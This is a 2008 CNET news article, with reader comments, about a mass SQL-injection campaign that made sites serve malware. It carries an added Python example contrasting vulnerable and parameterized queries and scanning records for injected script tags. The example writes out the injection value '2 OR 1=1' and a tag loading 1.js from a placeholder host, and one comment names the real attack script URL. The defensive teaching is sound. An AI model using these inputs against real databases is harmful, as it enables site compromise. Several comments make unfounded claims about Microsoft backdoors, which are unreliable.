April 27, 2008 2:09 PM PDT

Microsoft denies fault in hacks

by Jennifer Guevin

Microsoft is denying that a recent rash of Web server attacks is the company's fault.

In a blog posted late Friday night, Bill Sisk, of the Microsoft Security Response Center, wrote that the attacks are not due to any new or unknown security flaws in Internet Information Services or Microsoft SQL Server. Rather, he says, the attacks are made possible by SQL injection exploits, and he points Web developers to the company's list of best practices to prevent such attacks.

Ongoing attacks have affected half a million Web pages, compromising them so they serve up malware, according to several reports. The hacked sites include government sites in the U.K. and sites belonging to the United Nations.

All it takes for a computer to become infected is a visit to a compromised site. While viewing that site, the injected JavaScript loads a file named 1.js. The file is located on a malicious server, which then attempts to execute eight different exploits targeting Microsoft applications.
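The flaw Sisk points to is a query that splices a request value straight into SQL text, so the database parses whatever the client sent; the remedy in Microsoft's best-practice list is to bind values as parameters instead. The following example is added here and is not code from the article, from Microsoft, or from any affected site. It uses Python's standard sqlite3 module in place of SQL Server and a constructed events table (modelled loosely on an `Edetail.asp?EventID=...` style lookup, which is an assumption) to show the vulnerable and parameterized lookups side by side, and it adds a scanner for the stored-record side of this incident: the `<script src=...>` tags that, as one commenter below describes, were written into every record of a database. The host name `malicious.example` is a placeholder, not the real script host.

```python
import re
import sqlite3

# Constructed sample rows standing in for an events table; not from any real site.
SAMPLE_EVENTS = [
    (1, "Town hall", 1),
    (2, "Budget review", 1),
    (3, "Internal audit", 0),  # not public: must never be returned to a visitor
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)"
    )
    conn.executemany("INSERT INTO events VALUES (?, ?, ?)", SAMPLE_EVENTS)
    return conn


def lookup_vulnerable(conn, event_id):
    """Classic-ASP-style query building: the request value becomes part of the
    SQL text, so a value like '2 OR 1=1' rewrites the WHERE clause and leaks
    rows the public=1 filter was meant to hide."""
    sql = "SELECT title FROM events WHERE public = 1 AND id = " + event_id + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, event_id):
    """Same lookup with a bound parameter: the driver sends the value as data,
    so '2 OR 1=1' is compared against the id column and matches nothing."""
    sql = "SELECT title FROM events WHERE public = 1 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (event_id,))]


# Matches a <script> tag carrying a src attribute and captures the referenced URL.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def find_injected_scripts(rows):
    """Scan (row_id, text) pairs for <script src=...> tags, the payload the
    mass injection left behind in database records. Returns (row_id, url)
    for every tag found so an operator can locate and clean affected rows."""
    hits = []
    for row_id, value in rows:
        if not isinstance(value, str):  # NULLs and numeric columns cannot carry a tag
            continue
        for match in SCRIPT_SRC.finditer(value):
            hits.append((row_id, match.group(1)))
    return hits


def scan_table(conn):
    """Run the record scan over the title column of the sample table."""
    return find_injected_scripts(conn.execute("SELECT id, title FROM events"))


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "2 OR 1=1"))     # leaks the non-public row
    print(lookup_parameterized(db, "2 OR 1=1"))  # returns nothing
    # Constructed defaced record using a placeholder host, not the real one.
    db.execute(
        "UPDATE events SET title = title || ? WHERE id = 2",
        ("<script src=http://malicious.example/1.js></script>",),
    )
    print(scan_table(db))  # the scanner reports row 2 and the external URL
```

The scanner is deliberately column-agnostic: in the incident described here the tag was appended to text in many tables, so the same function can be fed `SELECT id, <column>` results from each text column in turn, and a clean database returns an empty list.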

Related story: Web 2.0, meet Internet attack 2.0

Jennifer Guevin is assistant managing editor of CNET News. She focuses on science and green tech. But she also makes the occasional contribution to CNET's kitchen gadgets blog or writes about the latest Web distraction. Once a week, she takes the mic as host of CNET's Daily News Podcast. E-mail Jennifer.
Of course!
by Gomphos April 27, 2008 3:07 PM PDT
See, it's not their fault that this particular exploit allows the file to
"[attempt] to execute eight different exploits targeting Microsoft
applications."
This leads to a question:
by Penguinisto April 27, 2008 3:25 PM PDT
Unlike PHP (in which the script coders are basically on their own), doesn't the ASP language have a big, fat build kit (actually, 'kits' and add-on modules) built and shipped by Microsoft? And don't those kits have checking against such things like, oh, SQL injection exploits?
You can lead a horse to water-
by Vegaman_Dan April 27, 2008 7:56 PM PDT
But you can't make him use the tools provided to check their own work.

As easy as it is to automatically blame Microsoft for this one, when you read the source material for this one, it's clear that the tools to prevent it were available- the coders simply didn't use them.

Since this affects Java as well, I lean more towards sloppy programming and not the provider of the tools themselves.

Should I blame Craftsman because the water pump on my Chevy broke when I didn't use the wrenches provided to me in the kit?
Microsoft = "No it can't be our software, our software is flawless"
by JCPayne April 27, 2008 4:00 PM PDT
Right?
No
by timber2005 April 28, 2008 5:40 AM PDT
Microsoft said it's not due to a known or unknown flaw in the software. Meaning, for people who can't understand that, it's not something that's known and being exploited, and it's not something that they haven't discovered thus far.
Microsoft's business customers can send logs to Microsoft so they can track this stuff, and I'm willing to bet of the 1.8 million, they didn't just receive five and call it not their fault.
Give it a break already....
by eferron April 28, 2008 6:51 AM PDT
What Microsoft is not saying. Microsoft has admitted that its software can be exploited along with everyone else's. These attacks are not specific to Microsoft. Microsoft has posted all over the world that beware, if you do not want to be hacked then follow these guidelines. People chose to ignore them and this is the result. Saying other vendors are better based on this is like saying we won't use a gas stove because it is easy to get burned, we are using electric (see, no flames).
typical
by ballmerisanape April 27, 2008 4:55 PM PDT
Microsoft and its fanboys love blaming the user.
Blame in wrong direction
by sysopdr April 27, 2008 4:59 PM PDT
I know I keep saying this, and I expect to keep saying it until someone either convinces me I am wrong or the message gets through ...
Why do we in the computer industry automatically blame the victim or the developer? Is this conditioning or our binary way of thinking or?
The real people who we should be blaming and going after are the malware writers (MalZ) and not Microsoft or Mozilla or McAfee.
We might also start blaming our governments as well for being so far behind in combatting this criminal behaviour.
When someone breaks into your house do you blame the contractor?
When someone steals your car do you blame Ford?
We have to stop this blame the developer mentality because it takes us away from what should be our main focus and that is finding and eliminating the MalZ that are attacking our systems. We need to either get our police forces to start catching these guys or we have to do it ourselves if they are unable or unwilling.
It's a bit more complex than that...
by Penguinisto April 27, 2008 5:26 PM PDT
IMHO, we will always have incompetent coders among us.

That said, there is a vast difference between languages that have little documentation and no real IDE to speak of, and a language (like, say, ASP) that has a plethora of IDE support and brags on ease-of-coding and ease-of-deployment.

So where was Microsoft when their IDEs failed to check against a simple SQL injection attack? Where was Microsoft when their bragged-on ease-of-use/ease-of-deployment language and development tools failed them utterly? Where was Microsoft? Why, they were busy blaming users for taking them at their word, that's where.

--

And there's still one other monster question at hand here.

Why is it that when a PHP script allows a PHP-based site to be pwned, the sysop merely has --at most-- to be rid of the offending script, and rebuild/restore the bits and bobs within the chrooted directories that Apache was handling at the time.

Meanwhile, this little IIS/ASP exploit apparently allows a perpetrator to [i]own the entire frickin' server[/i]. Perhaps that little bit speaks volumes on just how insecure IIS and Windows are than anything else, and blaming users for that chain of an attack is not ignorant - it's stupid.

--

Guess that, overall, Microsoft does have to eat some crow here... and maybe they won't be so cavalier about pushing their pet languages as so easy to build and deploy anymore? Heh - I'm not holding my breath.

/P
Spot on!
by Lee in San Diego April 27, 2008 5:28 PM PDT
" The real people who we should be blaming and going after is the
malware writers"

Spot on! Fire for effect!

All operating systems need to be as bullet proof as possible and
updated as necessary, but the real criminal is the criminal.
Completely off base
by The_Decider April 27, 2008 7:01 PM PDT
A more reasonable analogy would be a bank vault manufacturer leaving in a flaw so all a burglar would have to do to crack it is kill the power, or building it with such shoddy materials that 2-3 hits by a sledgehammer will break it.

Are you telling me that the vault manufacturer would not be held liable?

If someone breaks into my house and my alarm system didn't take note of it, guess who is also at fault?

That is a much closer analogy to software security than your uninformed comments. Many companies, most notably Microsoft pay lip service to employing secure coding practices, and the end results are predictable.

Unlike the alarm company, MS skates out of all financial, legal, and ethical liability.
Who is easier to blame?
by Vegaman_Dan April 27, 2008 7:58 PM PDT
It's far easier to blame a monolithic company like Microsoft or Apple than to take responsibility for your own actions or sloppy code.

Unfortunately we will have many people here who will blame the provider of the tools and not the people who failed to use them, or those that used them in a malicious way.

It's an important distinction to make in my view.
AGREED
by timber2005 April 28, 2008 5:41 AM PDT
I agree 100%, it's the malware creators we should be mad at.

Wow... there is some intelligence on these comments.
Wrong
by Phillep_H April 28, 2008 11:57 AM PDT
If Ford added a "feature" that allowed people to open the door, start the car, and drive off without the keys, I most certainly would blame Ford.

Especially if Ford, through predatory marketing practices, held 90% or so of the market and retail shelf space.
Microsoft has never told a lie.
by t8 April 27, 2008 5:18 PM PDT
<quote>the attacks are not due to any new or unknown security flaws in Internet Information Services or Microsoft SQL Server.</quote>

Microsoft has never told a lie, so that settles it then.
The fault is with bad web devs
by kenpm April 27, 2008 5:35 PM PDT
ASP.NET has some protections against SQL injections, ASP classic does not. However, it's still up to the individual developers to make sure they sanitize user input before committing it to the database. Faulting Microsoft in this case would be like faulting the creators of C++ because some lazy developers use the language incorrectly and allow buffer overflows.
Any modern framework worth anything
by The_Decider April 27, 2008 7:05 PM PDT
Checks for buffer overflows, string format exploits, SQL injection, etc.

Granted it is not 100% effective and developers still need to be aware of these issues which is a major problem, even today. Most developers have no business writing code because they do not have the necessary background to write secure, efficient code.

Any framework worth using would have caught something as simple as this. Let me guess, the countless exploits against Windows over the years is not the fault of Microsoft either.

I fault Bjarne Stroustrup for C++. What a poorly thought out, eventually bloated beyond all reason language.
It's easier to blame Microsoft and more fun
by Vegaman_Dan April 27, 2008 8:11 PM PDT
It wouldn't be nearly as much fun if you asked people to be responsible for their own actions or inactions. It's much more fun to blame the company than the users.

Unfortunately there are many people in society today that do not believe in personal responsibility. Some are posting here in the very story thread. Those are the scary people.
Java has such flaw as well
by t7c192 April 27, 2008 6:47 PM PDT
Even Java/JSP has such flaws, and developers will have to protect against that. You can always do SQL injection on JDBC if not protected, so can't really blame MS for that.
You can blame Microsoft for anything. No logic required.
by Vegaman_Dan April 27, 2008 8:14 PM PDT
My sink trap got plugged up again with some food debris in the kitchen. Clearly that is Microsoft's fault. They took no action at all to prevent it so therefore it's their fault.

Now if I had been using an iSink, the sink would still be stopped up, but it would smell better and have interesting colors. :)
Probably open source or Linux miscreants
by WJeansonne April 27, 2008 7:36 PM PDT
Their hatred of Microsoft runs deep, like most open source fanatics and Linux enthusiasts.
Damn miscreants
by System Tyrant April 27, 2008 10:00 PM PDT
It was probably people who have nothing better to do than attack servers to feel good about themselves. Microsoft just seems to be a) an easier target, b) just more fun to go after.
LOL
by The_Decider April 28, 2008 9:36 AM PDT
Script kiddies using Windows based tools are the people doing most of the exploits. These kids probably don't even know what Linux is.

Your comments are laughable.
No, it's probably all those insecure Linux websites.
by richto April 30, 2008 2:15 PM PDT
It's probably coming from all those Linux sites running PHP and MySQL. They have been like Swiss cheese for years.
1.8 Million Infected Sites!
by Stating April 27, 2008 8:18 PM PDT
Google this: "1,js". This is a national security risk.

Huge number of infected sites:
THE UNITED NATIONS (events.un.org/Edetail.asp?EventID=1055&BeginDate=1/22/2007)
United Methodist Church, Harcourt Publishers,
Bahrain Oil and Gas, West Virginia Wesleyan College, e-law, Wyoming Ranch Vacations, Wine Bars, Podcasts, Capacitor sales, Water Heater sales, Toyota dealers, RV parks, chiropractors, etc.

Here's a choice discussion:

"The script -www.nihaorr1.com/1.js is getting inserted into every record of my organization's SQL db. I'm the accidental techie in my office, and I'm clueless as to the vulnerability in our code. After a restore, the site gets hit every other day. I've searched around and no one seems to have an answer to this specific problem. There's no doubt in my mind that our coding has a loophole in it somewhere, but I'm not sure what to look for."
Typical microsoft response, blame the end user
by The_happy_switcher April 27, 2008 10:29 PM PDT
And treat its users like idiots.
Try reading the article
by bemenaker April 28, 2008 5:30 AM PDT
The blame is on the web developers, not the end user
Source before commenting
by Vegaman_Dan April 28, 2008 7:18 AM PDT
I read the story posted on CNET and the source material that they used to write the story which is also online.

Microsoft didn't blame anyone for it. In fact, nobody was blaming Microsoft either. Both stories made it very clear that the exploit was done through poorly written/tested code on web pages that is user created.

Give Microsoft some time today (Monday) to get their act together so they can blame end users- they haven't had time to even respond to this yet. THEN you can get all up in arms about it. :)
Microsoft "WHAT? ME?!!"
by itraveler April 27, 2008 10:42 PM PDT
If these clowns spent more time on security and less time figuring out how to make us run their D@#N GENUINE ADVANTAGE crapware every hour... maybe these holes would be patched by now.

Now the classic response... "Oh yea, everybody knows there is a hole there"...
preying on the default
by Kev Orng April 28, 2008 7:44 AM PDT
This is why I always try to encourage ecological diversity with family, friends and coworkers. I don't care if you prefer Windows, Mac, Linux; IE, Firefox, Safari, Flock, Opera; Outlook, Thunderbird, Entourage... The important thing is that you try or at least look into the alternatives rather than just accepting the default; then these hacks and viruses and malware will not have such wide-ranging repercussions, simply because they can't spread as far or as fast, because they can't interbreed.

Just like in the real world; if you only have one kind of honeybee, then a honeybee virus can wipe out the whole population.

So yeah, if you prefer Windows, more power to you; but at least introduce a bit of genetic diversity into the system by using one of the many alternative browsers and email clients. Thanks.

I use a Mac with a Safari/Flock browser combo.
mySQL and php
by gggg sssss April 28, 2008 8:48 AM PDT
can be owned with SQL injection just as easily. Neither are MS products.
I got hacked, MS's fault
by FutureGuy April 28, 2008 8:40 AM PDT
Someone logged into my computer and hacked it. How could they guess my blank password, had to be MS's fault. For those who don't know what a SQL injection attack is read up before pointing fingers. SQL injection is a result of bad programming and every website is vulnerable to stupid programmers.
LOL
by The_Decider April 28, 2008 12:19 PM PDT
Too bad the way MS stores passwords makes it several orders of magnitude easier to crack than the exact same password stored in Linux.
It is the user's fault
by rcrusoe April 28, 2008 9:05 AM PDT
Anyone with any knowledge of Microsoft's security record should know that the only place for a Windows computer is behind a strong firewall with no access to the Internet.
Take the finger pointing and shove it!!
by deadteck April 28, 2008 11:47 AM PDT
The thing that gets me with people is that they are so quick to point the finger at everything but the real problem. The problem isn't the developer of the website or the software developer, it's the morons who don't have anything better to do (or are too slack to get a real job) with their lives and spend countless hours writing code to try and ruin someone else's day. That is where the finger pointing needs to go. Web dev and software dev isn't the easiest of jobs, nor is anything perfect. So for those of you wanting to point the finger at one or the other, use some DAMN common sense.
Your premise is false
by notgonnatellya April 28, 2008 6:54 PM PDT
The people doing this type of thing aren't slackers trying to ruin your day. That's so 10 years ago.

These days, most malware is developed by talented developers, engineers and a few architects who work in criminal organizations.

So, yes, it is the developer's fault. Now there are some things that you can't anticipate, but following coding guidelines that are provided by MS (assuming that's who wrote the OS/Server/Dbase used), is just common sense.
When people point fingers . . . . . . .
by tech_no_man April 28, 2008 4:52 PM PDT
When people point fingers there are four pointing back at you. Normally I would be on Microsoft's back on this, but they are not at fault here.

What happens is that most programmers, web programmers and such learn programming by the seat of their pants, self taught, no formality, no security in mind. Then they never learn to program by "Best Practices". They learn to program for "whatever works", which usually is not secure methods. If IT is given the tools and informed not to program this way or the other by the manufacturer because it will cause problems, then the fault belongs to the programmer and end user if they use methods not advised.

The "anything goes" has to stop being "the best practice". Sloppy programming has to be stopped by the end user and programmer.
I said it a million times, turn off scripting!
by chash360 April 28, 2008 6:05 PM PDT
I won't blame this one on M$ directly, but indirectly I will. Who started the whole scripting craze? M$ did. This was in direct violation of the most basic DOD security protocol on the Internet before it went to the mainstream.

That Security Protocol: DO NOT EVER EXECUTE ARBITRARY CODE FROM A REMOTE SOURCE EVER!

(doing so in the past when it was DOD's network would have gotten your security clearance revoked, court martial, and perhaps some fingers removed ;-()

Even if you trust the source, you cannot trust the connection! Someone slices the line mid-transfer and garbage collects on it, you have no idea what your computer might do with that garbage if executed!

The only code that should be executed on any computer (networked or not) is code that is tested, and proven safe on that physical system. You should always do this in isolation from the network first, and then test in isolated network environment, before daring to run that code while connected on the Internet.

Client Side Scripting, be it VB Script, ActiveX control, Java, Flash, Perl, etc. completely violates this, but the world is hooked on this scripting drug, and won't detox, or go to rehab.

The original HTML spec was not vulnerable to this because it is a Markup Language not a programming language. It was designed intentionally that way so as to prevent this from happening, because back in the good old days, when the Internet was mostly SMTP, NNTP, HTML and IRC, we knew better than to execute arbitrary remote code!

Maybe I need to go into the IT Security Field because apparently there is not a single intelligent person (with integrity) working in it now, or else they would have told management that scripting is not safe ever!

(but I always suspected that the reason client side scripting actually got out there was that they wanted this insecurity, which is why I have refused that field).
The REAL fault lies with TCP/IP
by jasmred April 29, 2008 1:59 AM PDT
Having worked in universities where the GURUs kept telling me that MS knows NOTHING about networking and that the best way to do networking was TCP/IP I have to ask them; "How the hell did they (the egghead academics) allow a protocol that has NO security attributes built into the basic framework to become the backbone of modern communications?"

It was the US military and the Standards Organisations that developed this junk heap and the university "free love" attitudes that propagated it around the world...

What a joke.

I remember using Blackcomb (go and look up your history books) that was secure and worked really quickly over a 1440 baud dial-up link. It was revolutionary stuff - guess who? Microsoft - of course!
targeting Microsoft applications.
by Melekai April 28, 2008 6:34 PM PDT
'nuff said.
Microsoft is to blame.
by as901 April 29, 2008 4:35 AM PDT
Mycrosoft has a long standing belief that once you place Windows in your computer, "Microsoft has a right to access your computer and disable it at will!"

Because of this belief, mycrosoft always leaves a "backdoor" way for them to access your computer. If they believe that you do not have the legal right to their software, they can disable your computer.

To do this trick requires a method to remotely access your computer. When Hackers find that way Microsoft offers "security updates" that close that backdoor and open another.

Many people with legal copies of Windows have suffered Microsoft's anger. They may have purchased a legal copy from a friend, or they may have purchased a legal copy from a company that went under.

It is Microsoft policy to assume guilt. If you are not the one who it was registered to from the beginning, if you go to their update section, you may find your computer, or part of your computer, no longer working.

As if that is not bad enough, Microsoft leaves our systems open and at risk, so they may inspect our systems at will.

I use Linux. I do so for two reasons. The first is the stable nature of Linux. The second reason is my belief that my computer is my own property, and Microsoft does not have a right to examine or alter my computer, if they so choose.

Mark Heinemann
OK
by alegr April 29, 2008 9:09 AM PDT
Now put your tin foil hat back on. Make sure to give your daily prayer to the holy church of Invincible U-x. Blessed be poor souls.
Damned forever be those security lists, spreading unspeakable heresies about U-x flaws, such as www.matasano.com.